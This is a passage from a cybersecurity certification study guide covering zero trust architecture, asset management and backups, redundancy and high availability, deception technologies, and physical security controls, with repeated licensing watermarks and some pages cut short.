policy decision point. The policy decision point is responsible for defining policies
that limit access to resources on a need-to-know basis, monitoring network
activity for suspicious behavior, and updating policies to reflect changing network
conditions and security threats. The policy decision point is comprised of two
subsystems:
• The policy engine is configured with subject and host identities and credentials,
access control policies, up-to-date threat intelligence, behavioral analytics,
and other results of host and network security scanning and monitoring. This
comprehensive state data allows it to define an algorithm and metrics for
making dynamic authentication and authorization decisions on a per-request
basis.
Where systems in the control plane define policies and make decisions, systems
in the data plane establish sessions for secure information transfers. In the data
plane, a subject (user or service) uses a system (such as a client host PC, laptop,
or smartphone) to make requests for a given resource. A resource is typically an
enterprise app running on a server or cloud. Each request is mediated by a policy
enforcement point. The enforcement point might be implemented as a software
agent running on the client host that communicates with an app gateway. The
policy enforcement point interfaces with the policy administrator to set up a secure
data pathway if access is approved, or tear down a session if access is denied or
revoked.
The processes implementing the policy enforcement point are the only ones permitted to
interface with the policy administrator. It is critical to establish a root of trust for these
processes so that policy decisions cannot be tampered with.
The data pathway established between the policy enforcement point and the
resource is referred to as an implicit trust zone. For example, the outcome of a
successful access request might be an IPsec tunnel established between a digitally
signed agent process running on the client, a trusted web application gateway, and
the resource server. Because the data is protected by IPsec transport encryption,
no tampering by anyone with access to the underlying network infrastructure
(switches, access points, routers, and firewalls) is possible.
The goal of zero trust design is to make this implicit trust zone as small as
possible, and as transient as possible. Trusted sessions might only be established
for individual transactions. This granular or microsegmented approach is in
contrast with perimeter-based models, where trust is assumed once a user has
authenticated and joined the network. In zero trust, place in the network is not a
sufficient reason to trust a subject request. Similarly, even if a user is nominally
authenticated, behavioral analytics might cause a request to be blocked or a
session to be terminated.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Separating the control plane and data plane is significant because it allows for
a more flexible and scalable network architecture. The centralized control plane
ensures consistency for access request handling across both the managed
enterprise network and unmanaged Internet or third-party networks, regardless
of the devices being used or the user’s location. This makes managing access
control policies and monitoring network activity for suspicious behavior easier.
Continuous monitoring via the independent control plane means that sessions can
be terminated if anomalous behavior is detected.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Embedded System and Zero Trust
Architecture
6
of IoT devices?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 6
Summary
5
You should be able to summarize virtualization and cloud computing concepts and
understand common cloud security concepts related to compute, storage, and
network functions.
• If using a CSP, create an SLA and security responsibility matrix to identify who
will perform security-critical tasks. Ensure that reporting and monitoring of cloud
security data is integrated with on-premises monitoring and incident response.
• Evaluate the security features of embedded devices and isolate them from other
network devices.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Asset management, security architecture resilience, and physical security are crucial
concepts that underpin effective cybersecurity operations. Asset management
involves identifying, tracking, and safeguarding an organization’s assets, ranging
from hardware and software to data and intellectual property. By knowing what
assets exist, where they are, and their value to the organization, cybersecurity
teams can prioritize their efforts to protect the most critical assets from cyber
threats.
Security architecture resilience refers to the design and implementation of systems
and networks in a way that allows them to withstand and recover quickly from
disruptions or attacks. This includes redundancy, fail-safe mechanisms, and robust
incident response plans. By building resilience into the security architecture,
cybersecurity teams ensure that even if a breach occurs, the impact is minimized,
and normal operations can be restored quickly.
Physical security protects personnel, hardware, software, networks, and data
from physical actions and events that could cause severe damage or loss to an
organization. This includes controls like access badges, CCTV systems, and locks,
as well as sensors for intrusion detection. Physical security is a critical aspect of
cybersecurity, as a breach in physical security can lead to direct access to systems
and data, bypassing other cybersecurity measures.
Together, these concepts support cybersecurity operations, help protect against
a wide range of problems, and ensure the continuity of operations in the face of
disruptive events.
Lesson Objectives
In this lesson, you will do the following:
• Review important data backup concepts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 7A
Asset Management
2
Asset Tracking
An asset management process tracks all the organization’s critical systems,
components, devices, and other objects of value in an inventory. It also involves
collecting and analyzing information about these assets so that personnel can make
informed changes or work with assets to achieve business goals.
There are many software suites and associated hardware solutions available for
tracking and managing assets. An asset management database can store as much
or as little information as necessary. Typical data would be type, model, serial
number, asset ID, location, user(s), value, and service information.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Asset Acquisition/Procurement
From the perspective of supporting cybersecurity operations, asset acquisition/
procurement, policies are critical in ensuring organizations maintain a robust
security posture. Key considerations include selecting hardware and software
solutions with strong security features, such as built-in encryption, secure boot
mechanisms, and regular updates or patches. It is crucial to work with reputable
vendors and manufacturers that prioritize security and provide ongoing support to
address potential vulnerabilities in their products.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
using a standard naming convention. CIs are defined by their attributes and
relationships stored in a configuration management database (CMDB).
Diagrams are the best way to capture the complex relationships between network
elements. Diagrams illustrate the use of CIs in business workflows, logical (IP) and
physical network topologies, and network rack layouts.
Data Backups
Backups play an essential role in asset protection by ensuring the availability
and integrity of an organization’s critical data and systems. By creating copies of
important information and storing them securely in separate locations, backups are
a safety net in case of hardware failure, data corruption, or cyberattacks such as
ransomware. Regularly testing and verifying backup data is crucial to ensuring the
reliability of the recovery process.
In an enterprise setting, simple backup techniques often prove insufficient to address
large organizations’ unique challenges and requirements. Scalability becomes a
critical concern when vast amounts of data need to be managed efficiently. Simple
backup methods may struggle to accommodate growth in data size and complexity.
Performance issues caused by simple backup techniques can disrupt business
operations because they slow down applications while running and typically have
lengthy recovery times. Additionally, enterprises demand greater granularity and
customization to target specific applications, databases, or data subsets, which
simple techniques often fail to provide.
Compliance and security requirements necessitate advanced features such as
data encryption, access control, and audit trails that simplistic approaches typically
lack. Moreover, robust disaster recovery plans and centralized management are
essential components of an enterprise backup strategy. Simple backup techniques
might not support advanced features like off-site replication, automated failover,
or streamlined management of the diverse systems and geographic locations that
comprise a modern organization’s information technology environment.
Critical capabilities for enterprise backup solutions typically include the following
features:
• Support for various environments (virtual, physical, and cloud)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Backup Frequency
Many dynamics influence data backup frequency requirements, including data
volatility, regulatory requirements, system performance, architecture capabilities,
and operational needs. Organizations with highly dynamic data or stringent
regulatory mandates may opt for more frequent backups to minimize the risk of
data loss and ensure compliance. Conversely, businesses with relatively stable data
or less stringent regulatory oversight might choose less frequent backups, balancing
data protection, data backup costs, and maintenance overhead. Ultimately, the
optimal backup frequency is determined by carefully assessing an organization’s
regulatory requirements, unique needs, risk tolerance, and resources.
Recovery Validation
Critical recovery validation techniques play a vital role in ensuring the effectiveness
and reliability of backup strategies. Organizations can identify potential issues
and weaknesses in their data recovery processes by testing backups and making
necessary improvements. One common technique is the full recovery test, which
involves restoring an entire system from a backup to a separate environment and
verifying the fully functional recovered system. This method helps ensure that all
critical components, such as operating systems, applications, and data, can be
restored and will function as expected.
Another approach is the partial recovery test, where selected files, folders, or
databases are restored to validate the integrity and consistency of specific data
subsets. Organizations can perform regular backup audits, checking the backup
logs, schedules, and configurations to ensure backups are created and maintained
as intended and required. Furthermore, simulating disaster recovery scenarios,
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Filesystem snapshots, like those provided by ZFS or Btrfs, capture the state of
a file system at a given moment, enabling users to recover accidentally deleted
files or restore previous versions of files in case of data corruption.
• SAN snapshots are taken at the block-level storage layer within a storage area
network. Examples include snapshots in NetApp or Dell EMC storage systems,
which capture the state of the entire storage volume, allowing for rapid recovery
of large datasets and applications.
By utilizing VM, filesystem, and SAN snapshots, organizations can enhance their
data protection and recovery strategies, ensuring the availability and integrity of
their data across different storage layers and systems.
The checkpoint configuration section for a Hyper-V virtual machine. Checkpoints refer to Microsoft's
implementation of snapshot functionality. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Encrypting Backups
Encryption of backups is essential for various reasons, primarily data security,
privacy, and compliance. By encrypting backups, organizations add an extra layer
of protection against unauthorized access or theft, ensuring that sensitive data
remains unreadable without the appropriate decryption key. This is particularly
crucial for businesses dealing with sensitive customer data, intellectual property,
or trade secrets, as unauthorized access can lead to severe reputational damage,
financial loss, or legal consequences.
Copies of sensitive data stored in backup sets are often overlooked, so many
industries and jurisdictions have regulations that mandate the protection of
sensitive data stored in backups. Encrypting backups helps organizations meet
these regulatory requirements and avoid fines, penalties, or legal actions resulting
from noncompliance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Asset Disposal
Asset disposal/decommissioning concepts focus on the secure and compliant
handling of data and storage devices at the end of their lifecycle or when they are
no longer needed. Some important concepts include the following:
Sanitization—Refers to the process of removing sensitive information from
storage media to prevent unauthorized access or data breaches. This process uses
specialized techniques, such as data wiping, degaussing, or encryption, to ensure
that the data becomes irretrievable. Sanitization is particularly important when
repurposing or donating storage devices, as it helps protect the organization’s
sensitive information and maintains compliance with data protection regulations.
Destruction—Involves the physical or electronic elimination of information stored
on media, rendering it inaccessible and irrecoverable. Physical destruction methods
include shredding, crushing, or incinerating storage devices, while electronic
destruction involves overwriting data multiple times or using degaussing techniques
to eliminate magnetic fields on storage media. Destruction is a crucial step in the
decommissioning process and ensures that sensitive data cannot be retrieved or
misused after the disposal of storage devices.
Certification—Refers to the documentation and verification of the data sanitization
or destruction process. This often involves obtaining a certificate of destruction
or sanitization from a reputable third-party provider, attesting that the data has
been securely removed or destroyed in accordance with industry standards and
regulations. Certification helps organizations maintain compliance with data
protection requirements, provides evidence of due diligence, and reduces the risk
of legal liabilities. Certifying data destruction without third-party involvement can be
challenging, as the latter provides an impartial evaluation.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Active KillDisk data wiping software. (Screenshot used with permission from LSoft
Technologies, Inc.)
Files deleted from a magnetic-type hard disk are not fully erased. Instead, the
sectors containing the data are marked as available for writing, and the data they
contain are only removed as new files are added. Similarly, the standard Windows
format tool will only remove references to files and mark all sectors as usable. For
this reason, the standard method of sanitizing an HDD is called overwriting. This
can be performed using the drive’s firmware tools or a utility program. The most
basic type of overwriting is called zero filling, which sets each bit to zero. Single
pass zero filling can leave patterns that can be read with specialist tools. A more
secure method is to overwrite the content with one pass of all zeros, then a pass of
all ones, and then a third pass in a pseudorandom pattern. Some federal agencies
require more than three passes. Overwriting can take considerable time, depending
on the number of passes required.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Asset Management
3
4. You are advising a company about backup requirements for a few dozen
4.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 7B
Redundancy Strategies
6
Continuity of Operations
Continuity of operations (COOP) refers to the process of ensuring that an
organization can maintain or quickly resume its critical functions in the event of
a disruption, disaster, or crisis. COOP concepts and strategies aim to minimize
downtime, protect essential resources, and maintain business resilience. Key
elements of a COOP plan include identifying critical business functions, establishing
priorities, and determining the resources needed to support these functions.
Strategies often involve creating redundancy for IT systems and data, such as
implementing off-site backups, failover systems, and disaster recovery solutions.
Additionally, organizations may consider alternative work arrangements, such as
remote work or co-location arrangements, to maintain operations during a crisis.
Developing clear communication and decision-making protocols ensures that
employees understand their roles and responsibilities during an emergency.
Regular testing and updating of continuity of operations plans (COOP) are crucial
to ensure the organization can maintain essential functions during and after
disruptive events. Realistic scenarios designed to simulate various disruptions, such
as natural disasters, cyberattacks, or pandemics, must be used to assess the plan’s
effectiveness. Testing methods often include tabletop exercises, isolated functional
tests, or full-scale drills. Each approach provides different levels of assurance and
must therefore use pre-established evaluation criteria for measuring performance.
In essence, COOP strategies focus on proactively preparing for disruptions,
ensuring that organizations can continue to deliver essential services and minimize
the impact of unforeseen events on their operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Backups
Backups play a critical role in the continuity of operations plans (COOP) by
safeguarding against data loss and restoring systems and data in the event of
disruptions. Regular testing verifies the integrity and effectiveness of backups.
Testing backups helps ensure the backup process functions correctly by simulating
various scenarios and allows organizations to identify any issues or gaps in the
backup and recovery process. Testing backups validates the recoverability of
critical systems and data, reducing the risk of data loss and minimizing downtime
associated with disruptive events. Additionally, testing backups allows organizations
to assess their recovery plans, evaluate the speed and efficiency of their backup
systems, and ensure compliance with regulatory requirements. Inadequate backup
processes can lead to extended downtime, critical data loss, financial losses,
reputation damage, and noncompliance.
Capacity Planning
Capacity planning is a critical process in which organizations assess their current
and future resource requirements to ensure they can efficiently meet their business
objectives. This process involves evaluating and forecasting the necessary resources
in terms of people, technology, and infrastructure to support anticipated growth,
changes in demand, or other factors that may impact operations. For people,
capacity planning considers the number of employees, their skill sets, and the
potential need for additional training or hiring to meet future demands. This may
involve evaluating workforce productivity, analyzing staffing levels, and identifying
potential skills gaps. In terms of technology, capacity planning encompasses the
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
High Availability
High availability (HA) is crucial in IT infrastructure, ensuring systems remain
operational and accessible with minimal downtime. It involves designing and
implementing hardware components, servers, networking, datacenters, and
physical locations for fault tolerance and redundancy. In a high-availability setup,
redundant hardware components, such as power supplies, hard drives, and
network interfaces, reduce the risk of failure by allowing the system to continue
functioning if one component fails. Servers are often deployed in clusters or
paired configurations, which allows automatic failover from a primary server to a
secondary server in case of an issue.
Networking components, including switches, routers, and load balancers, are
also designed with redundancy in mind to maintain seamless connectivity. As the
backbone of high-availability infrastructure, datacenters employ redundant power
sources, cooling systems, and backup generators to ensure continuous operation.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Annual Downtime
Nines Value Availability (hh:mm:ss)
Six 99.9999% 00:00:32
Five 99.999% 00:05:15
Four 99.99% 00:52:34
Three 99.9% 08:45:36
Two 99% 87:36:00
Downtime is calculated from the sum of scheduled service intervals plus unplanned
outages over the period.
System availability can refer to an overall process, but also to availability at the level of
a server or individual component.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Site Considerations
Enterprise environments often provision resiliency at the site level. An alternate
processing or recovery site is a location that can provide the same (or similar) level
of service. An alternate processing site might always be available and in use, while a
recovery site might take longer to set up or only be used in an emergency.
Operations are designed to failover to the new site until the previous site can be
brought back online. Failover is a technique that ensures a redundant component,
device, application, or site can quickly and efficiently take over the functionality of
an asset that has failed. For example, load balancers provide failover in the event
that one or more servers or sites behind the load balancer are down or are taking
too long to respond. Once the load balancer detects this, it will redirect inbound
traffic to an alternate processing server or site. Thus, redundant servers in the load
balancer pool ensure there is no or minimal interruption of service.
Site resiliency is described as hot, warm, or cold:
• A hot site can failover almost immediately. It generally means the site is within
the organization’s ownership and ready to deploy. For example, a hot site could
consist of a building with operational computer equipment kept updated with a
live data set.
• A warm site could be similar, but with the requirement that the latest data set
needs to be loaded.
• A cold site takes longer to set up. A cold site may be an empty building with
a lease agreement in place to install whatever equipment is required when
necessary.
“Economies of scale” is a concept that refers to the cost advantages that businesses can
achieve when they increase production and output. Essentially, the more a company
produces, the cheaper it becomes to deliver those products.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Robust testing practices allow organizations to ensure that high availability, load
balancing, and failover technologies effectively fulfill their purpose to minimize
unexpected outages and maximize performance.
Clustering
Where load balancing distributes traffic between independent processing nodes,
clustering allows multiple redundant processing nodes that share data with one
another to accept connections. This provides redundancy. If one of the nodes in
the cluster stops working, connections can failover to a working node. To clients,
the cluster appears to be a single server. A load balancer distributes client requests
across available server nodes in a farm or pool and is generally associated with
managing web traffic whereas clusters are used to provide redundancy and high-
availability for systems such as databases, file servers and others.
Virtual IP
For example, an organization might want to provision two load balancer appliances
so that if one fails, the other can still handle client connections. Unlike load
balancing with a single appliance, the public IP used to access the service is shared
between the two instances in the cluster. This arrangement is referred to as a
virtual IP or shared or floating address. The instances are configured with a private
connection, on which each is identified by its “real” IP address. This connection runs
a redundancy protocol, such as Common Address Redundancy Protocol (CARP),
enabling the active node to “own” the virtual IP and respond to connections. The
redundancy protocol also implements a heartbeat mechanism to allow failover to
the passive node if the active one should suffer a fault.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Application Clustering
Clustering is also very commonly used to provision fault-tolerant application
services. If an application server suffers a fault in the middle of a session, the
session state data will be lost. Application clustering allows servers in the cluster to
communicate session information to one another. For example, if a user logs in on
one instance, the next session can start on another instance, and the new server
can access the cookies or other information used to establish the login.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Power Redundancy
All types of computer systems require a stable power supply to operate. Electrical
events, such as voltage spikes or surges, can crash computers and network
appliances, while loss of power from under-voltage events or power failures will
cause equipment to fail. Power management means deploying systems to ensure
that equipment is protected against these events and that network operations can
either continue uninterrupted or be recovered quickly.
Generators
A backup power generator can provide power to the whole building, often for
several days. Most generators use diesel, propane, or natural gas as a fuel source.
With diesel and propane, the main drawback is safe storage (diesel also has a shelf
life of between 18 months and 2 years); with natural gas, the issue is a reliable
gas supply in the event of a natural disaster. Datacenters are also investing in
renewable power sources, such as solar, wind, geothermal, hydrogen fuel cells, and
hydro. The ability to use renewable power is a strong factor in determining the best
site for new datacenters. Large-scale battery solutions, such as Tesla’s Powerpack
(tesla.com/powerpack), may provide an alternative to backup power generators.
There are also emerging technologies that use all the battery resources of a
datacenter as a microgrid for power storage (https://www.scientificamerican.com/
article/how-big-batteries-at-data-centers-could-replace-power-plants/).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Defense in Depth
Defense in depth is a comprehensive cybersecurity strategy that emphasizes the
implementation of multiple layers of protection to safeguard an organization’s
information and infrastructure. This approach is based on the principle that no
single security measure can completely protect against all threats. By deploying
a variety of defenses at different levels, organizations can create a more resilient
security posture that can withstand a wide range of attacks. For example, a defense
in depth strategy might include perimeter security measures such as firewalls
and intrusion detection systems to protect against external threats. Organizations
can implement segmentation, secure access controls, and traffic monitoring at
the network level to prevent unauthorized access and contain potential breaches.
Endpoint security solutions, such as antivirus software and device hardening, help
protect individual devices, while regular patch management ensures software
vulnerabilities are addressed promptly.
Additionally, implementing strong user authentication methods, such as multifactor
authentication, can further secure access to sensitive data and systems. Finally,
employee security awareness training and incident response planning are essential
components of a defense in depth strategy, helping to minimize human error and
ensure a rapid response to security incidents.
Vendor Diversity
Vendor diversity is essential for several reasons, offering benefits not only in terms
of cybersecurity but also in business resilience, innovation, and competition:
• Cybersecurity—Relying on a single vendor for all software and hardware
solutions can create a single point of failure. The entire infrastructure may be
at risk if a vulnerability is discovered in that vendor’s products. Vendor diversity
introduces multiple technologies, reducing the impact of a single vulnerability
and making it more difficult for attackers to exploit the entire system.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Other types of controls contribute to defense in depth, such as physical security controls
that block physical access to computer equipment and policies designed to define
appropriate use and consequences for noncompliance.
Multi-Cloud Strategies
A multi-cloud strategy offers several benefits for both cybersecurity operations and
business needs by leveraging the strengths of multiple cloud service providers. This
approach enhances cybersecurity by diversifying the risk associated with a single
point of failure, as vulnerabilities or breaches in one cloud provider’s environment
are less likely to compromise the entire infrastructure. Additionally, a multi-cloud
strategy can improve security posture by implementing unique security features
and services offered by different cloud providers. From a business perspective, a
multi-cloud approach promotes vendor independence, reducing the risk of vendor
lock-in and ensuring organizations can adapt to changing market conditions
or technology trends. This strategy fosters healthy competition among cloud
providers, often leading to more favorable pricing and better service offerings.
Furthermore, a multi-cloud strategy enables organizations to optimize their IT
infrastructure by selecting the most suitable cloud services for specific workloads or
applications, enhancing performance and cost efficiency.
In a practical example of a multi-cloud strategy, a company operating a large
e-commerce platform can distribute workloads across multiple cloud providers
to address high availability, data security, performance optimization, and
cost efficiency. By hosting the primary application infrastructure on one
cloud provider and using another for backup and disaster recovery, the
company ensures continuous operation even during outages.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Storing sensitive customer data with a cloud provider that offers advanced security
features and compliance certifications meets regulatory requirements. To address
latency and performance concerns, the company can leverage a cloud provider with
a global network of edge locations for content delivery and caching services. Finally,
cost-effective storage and processing services can be used by another provider for
big data analytics and reporting. This multi-cloud approach enables the e-commerce
company to build a more resilient, secure, and efficient IT infrastructure tailored to
their specific needs.
Deception Technologies
Deception and disruption technologies are cybersecurity resilience tools and
techniques to increase the cost of attack planning for the threat actor. Honeypots,
Honeynets, Honeyfiles, and Honeytokens are all cybersecurity tools used to detect
and defend against attacks. Honeypots are decoy systems that mimic real systems
and applications. They are designed to allow security teams to monitor attacker
activity and gather information about their tactics and tools. Honeynets are a
network of interconnected honeypots that simulate an entire network, providing a
more extensive and realistic environment for attackers to engage with. Honeyfiles
are fake files that appear to contain sensitive information, used to detect attempts
to access and steal data. Honeytokens are false credentials, login credentials, or
other data types used to distract attackers, trigger alerts, and provide insight into
attacker activity.
By deploying these tools, organizations can detect and monitor attacks, gather
intelligence about attackers and their methods, and proactively defend against
future attacks. These tools can also provide an additional layer of defense by
diverting attackers’ attention away from real systems and applications, reducing
the risk of successful attacks.
Disruption Strategies
Another type of active defense uses disruption strategies. These adopt some of
the obfuscation strategies used by malicious actors. The aim is to raise the attack
cost and tie up the adversary’s resources. Some examples of disruption strategies
include the following:
• Using bogus DNS entries to list multiple hosts that do not exist.
• Using port triggering or spoofing to return fake telemetry data when a host
detects port scanning activity. This will result in multiple ports being falsely
reported as open and slow down the scan. Telemetry can refer to any type of
measurement or data returned by remote scanning. Similar fake telemetry could
be used to report IP addresses as up when they are not, for instance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Testing Resiliency
Method of Testing
Testing system resilience and incident response effectiveness are crucial for
organizations to recover from disruptions and maintain business continuity.
By conducting various tests, organizations can identify potential vulnerabilities,
evaluate the efficiency of their recovery strategies, and improve their overall
preparedness for real-life incidents.
• Tabletop Exercises involve teams discussing and working through hypothetical
scenarios to assess their response plans and decision-making processes. These
exercises help identify knowledge, communication, and coordination gaps,
ultimately strengthening the organization’s incident response capabilities. For
example, a tabletop exercise might simulate a ransomware attack to test how
well the organization’s IT and management teams collaborate to mitigate the
threat and restore operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Documentation
Business continuity documentation practices cover planning, implementation,
and evaluation. Documentation supports the testing process. Documentation
includes test plans outlining the objectives, scope, and methods of tests and the
roles and responsibilities of individuals involved. Test scripts (or scenarios) provide
step-by-step instructions for performing the tests, and test results identify strengths
and weaknesses of the business continuity plan and the technical capabilities
supporting it. Documentation is the foundation for clear communication and
reporting of activities. It provides a common reference point for those involved
in business continuity testing and facilitates effective communication with
management, executive teams, and other relevant stakeholders. Third-party
assessments and certifications offer an objective and independent evaluation of
an organization’s testing practices. Third-party assessments and certifications offer
objective evaluation, compliance verification, validation of testing effectiveness,
industry recognition, and recommendations for continuous improvement.
Examples of third-party evaluations include assessments performed in alignment
with ISO 22301, PCI DSS, and SOC 2.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Redundancy Strategies
7
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 7C
Physical Security
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Physical sites at risk of a terrorist attack will use barricades such as bollards and
security posts to prevent vehicles from speeding toward a building.
Fencing
The exterior of a building may be protected by fencing. Security fencing needs
to be transparent (so guards can see any attempt to penetrate it), robust (so that
it is difficult to cut), and secure against climbing (which is generally achieved by
making it tall and possibly by using razor wire). Fencing is generally effective, but
the drawback is that it gives a building an intimidating appearance. Buildings that
are used by companies to welcome customers or the public may use more discreet
security methods.
Lighting
Security lighting is enormously important in the perception that a building is
safe and secure at night. Well-designed lighting helps to make people feel safe,
especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for
overall light levels, the lighting of particular surfaces or areas (allowing cameras to
perform facial recognition, for instance), and avoid areas of shadow and glare.
Bollards
Bollards are generally short vertical posts made of steel, concrete, or other
similarly durable materials and installed at intervals around a perimeter or
entrance. Sometimes bollards are nonobvious and appear as sculptures or as
building design elements. They can be fixed or retractable, and some models can be
raised or lowered remotely. Bollards can serve several purposes, such as protecting
pedestrians from vehicular traffic, preventing unauthorized vehicle access,
and providing perimeter security for critical infrastructure and facilities.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
They are often used to secure government buildings, airports, stadiums, store
entrances, and other public spaces. By preventing vehicles from entering restricted
areas, bollards can help mitigate the risks of vehicular attacks and accidents.
Bollards used to protect the entrance of Reading Train Station in Britain. (Image from user
rogerrutter © 123RF.com.)
Existing Structures
There may be a few options to adjust the site layout in existing premises.
When faced with cost constraints and the need to reuse existing infrastructure,
incorporating the following principles can be helpful:
• Locate secure zones, such as equipment rooms, as deep within the building as
possible, avoiding external walls, doors, and windows.
• Use a demilitarized zone design for the physical space. Position public access
areas so that guests do not pass near secure zones. Security mechanisms in
public areas should be highly visible to increase deterrence.
• Use signage and warnings to enforce the idea that security is tightly controlled.
Beyond basic “no trespassing” signs, some homes and offices also display signs
from the security companies whose services they are using. These may convince
intruders to stay away.
• Try to minimize traffic passing between zones. The flow of people should be “in
and out” rather than “across and between.”
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Give high-traffic public areas high visibility to hinder the covert use of gateways,
network access ports, and computer equipment, and simplify surveillance.
• In secure zones, position display screens or input devices away from pathways
or windows. Use one-way glass only visible from the inside out so no one can
look in through windows.
Generic examples of locks—From left to right: a standard key lock, a deadbolt lock, and an
electronic keypad lock. (Images from user macrovector © 123RF.com.)
Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector © 123RF.com.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Cable Locks
Cable locks attach to a secure point on the device chassis. A server chassis might
come with both a metal loop and a Kensington security slot. As well as securing the
chassis to a rack or desk, the position of the secure point prevents the chassis from
being opened without removing the cable first.
Access Badges
Access badges are a fundamental component of physical security in larger
organizations where control over access to various locations is critical. Plastic cards
embedded with magnetic strips, radio frequency identification (RFID) chips, or
near-field communication (NFC) technology are issued to authorized individuals,
such as employees, contractors, or visitors instead of physical keys. Access badges
replace physical keys but provide access similarly. This is achieved by requiring the
badge to be swiped, tapped, or brought into proximity with a reader at the access
point, like a door or turnstile. The reader communicates with a control system to
verify the badge’s authenticity and the level of access granted to the badge holder.
If the system recognizes the badge as valid and authorized for that area, the door
unlocks, granting access.
It is important to note that implementing this type of access control system requires
magnetic door-locking mechanisms and access card readers, which depend upon
electrical power and network communications at each access point (such as a
doorway.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Object Detection—Occurs when the camera system can detect changes to the
environment, such as a missing server or unknown device connected to a wall
port.
Circuit-based alarms are suited for use at the perimeter and on windows and doors.
These may register when a gateway is opened without using the lock mechanism
properly or when a gateway is held open for longer than a defined period. Motion
detectors are useful for controlling access to spaces not normally used. Duress
alarms are useful for exposed staff in public areas. An alarm might simply sound
like an alert or be linked to a monitoring system. Many alarms are linked directly
to local law enforcement or third-party security companies. A silent alarm alerts
security personnel rather than sounding an audible alarm.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Sensor Types
Sensors are critical in implementing physical security measures, providing proactive
detection and alerting capabilities against potential security breaches. These
devices can employ various technologies, including infrared, pressure, microwave,
and ultrasonic systems, each with unique advantages and suitable applications.
• Infrared sensors are commonly used in motion detection systems. They detect
changes in heat patterns caused by moving objects, such as a human intruder.
These are often used in residential and commercial security systems, triggering
alarms or activating security lights when detecting motion.
• Pressure sensors are typically installed inside floors or mats and are activated
by weight. They can be used in high-security areas to detect unauthorized access
or even in retail environments to count foot traffic.
• Microwave sensors emit microwave pulses and measure the reflection off
a moving object. They are often combined with infrared detectors in dual-
technology motion sensors. These sensors are less likely to trigger false alarms,
as the infrared and microwave sensors must be tripped simultaneously to trigger
an alarm. These can be useful in securing large outdoor areas like parking lots or
fenced areas.
• Ultrasonic sensors emit sound waves at frequencies above the range of human
hearing and measure the time it takes for the waves to return after hitting an
object. They are often used in automated lighting systems to switch lights on
when someone enters a room and switch them off again when the room is
empty.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Physical Security
6
objects?
4. What is a bollard?
4.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 7
Summary
5
• Include key information such as asset type, location, value, and ownership.
• Keep track of the location and status of assets, especially those that are
mobile or prone to theft.
• Certain assets, such as those related to health and safety, data protection,
or environmental impact must be managed in compliance with specific
regulations to avoid legal penalties.
• Clustering
• Site resiliency
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Using risk assessments, identify assets that have high availability requirements
and provision redundancy to meet this requirement:
• Use dual power supply, PDUs, PSUs, and generators to make the power
system resilient.
• Use NIC teaming, multiple paths, and load balancing to make networks
resilient.
• Secure the site perimeter and access points using fencing, barricades/bollards,
